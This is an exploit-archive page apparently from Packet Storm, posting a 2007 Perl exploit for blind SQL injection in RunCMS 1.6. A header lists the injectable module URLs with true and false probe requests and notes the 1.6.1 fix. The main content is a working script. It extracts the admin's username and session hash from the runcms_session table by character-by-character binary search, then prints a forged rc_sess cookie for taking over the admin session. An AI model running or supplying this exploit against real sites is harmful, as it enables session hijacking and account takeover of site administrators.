exploit the possibilities

runcms-sql.txt

runcms-sql.txt
Posted Dec 28, 2007
Authored by Sh2kerr | Site dsecrg.com

RunCMS version 1.6 get admin cookie remote blind SQL injection exploit.

tags | exploit, remote, sql injection
MD5 | 087b777aa997d970867589f82d3062e7

runcms-sql.txt

Change Mirror Download
#/******************************************************************/
#/**** RUNCMS 1.6 BLIND SQL Injection Exploit get Admin Cookie *****/
#/******************************************************************/
#/*********** exploit get admin cookie that can be used *********/
#/*********** to login by pasting it into browser (Opera) *********/
#/*********** and then get access to Admin session *********/
#/*********** and change Admins password *********/
#/*********** *********/
#/******************************************************************/
#/******************************************************************/
#/*********** tested on RUNCMS english version 1.6 *********/
#/******************************************************************/
#/******************************************************************/
#/* Date of Public EXPLOIT: December 25, 2007 */
#/* Written by: Alexandr "Sh2kerr" Polyakov */
#/* from [Digital Security Research Group] */
#/* research@dsec.ru */
#/* */
#/* Original Advisory: */
#/******************************************************************/
#/* **/
#/******************************************************************/
#
#
#
#
# Details
#************************************************************************************
#
#
# Multiple Blind SQL Injection
#
# Attacker can inject SQL code in modules:
#
# http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
#
# Example:
#
# This query will return link to download file:
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
#
#
# This query will return error:
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0
#
#
#
# Fix Information
#*************************************************************************************
#
#RunCMS was altered to fix this flaw on Dec 15, 2007. Updated version (1.6.1) can be downloaded here:
# http://www.runcms.org/modules/mydownloads/visit.php?lid=131
#
#
#
# About
#*************************************************************************************
#
# Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration
# testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
# Digital Security Research Group focuses on web application and database security problems with vulnerability reports,
# advisories and whitepapers posted regularly on our website.
#
#
# Contact: research@dsec.ru
# http://www.dsec.ru (in Russian)
#
#
#
#
####################################################################################


















#!/usr/bin/perl


use LWP::UserAgent;

$path = $ARGV[0];
$string = "this file must"; # !!CHEAT!! this string must be changed if Runsms language is not English
$user_id = $ARGV[1];
if (@ARGV < 2) { &usage; }


$s_num =1;
$n=0;
$|++;
print "\r\n\r\n";

print "************ RunCMS 1.6 Blind SQLInjection Get Admin Cookie by Sh2kerr (DSecRG)****************\r\n";
print "*****************************************************************************\r\n";


while(1)
{
&found(48,122);

if ($char=="0")
{
print "\r\n\r\n";

($res1,$res2,$res3)=split(":",$allchar); #
$time = $res3+ 2678400;
print "*****************************************************************************\r\n";
print " Username: $res1\r\n";
print " Cookie Hash: $res2\r\n";
print " Cookie Time: $res3\r\n\r\n";
print "*****************************************************************************\r\n";
print " Place this string into your cookie parameter (in Opera) \r\n";
print " rc_sess=a:3:{i:0;i:$user_id;i:1;s:40:\"$res2\";i:2;i:$time;} \r\n";
print "*****************************************************************************\r\n";
if ($allchar=="0" & $res1=="0")
{print "\r\n ERROR: User not logged in , try another user_id \r\n"; }

#print " total requests: $n\r\n";
exit();
}
else
{ print ":) "; $allchar .= chr($char);
}

$s_num++;
}





sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];


if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char }

$r = int($fmax - ($fmax-$fmin)/2);
$check = ">$r";

if ( &check($check) )
{ &found($r,$fmax); }
else { &found($fmin,$r+1); }
}



sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;

while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i;}
$i++;
}
return;
}



sub check($)
{

$n++;
$ccheck = $_[0];

$http_query = $path." AND ascii(substring((SELECT CONCAT(uname,CHAR(58),hash,CHAR(58),time) FROM runcms.runcms_session WHERE uid=".$user_id."),".$s_num.",1))".$ccheck;


$mcb_reguest = LWP::UserAgent->new() or die;
$res = $mcb_reguest->post($http_query);

@results = $res->content;
foreach $result(@results)
{
if ($result =~ /$string/) { return 1; }
}
return 0;
}

sub usage
{
print "Usage: $0 [path_to_script?param] user_id \r\n";
print "e.g. : $0 http://server/modules/mydownloads/visit.php?lid=3 1";
exit();
}


Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close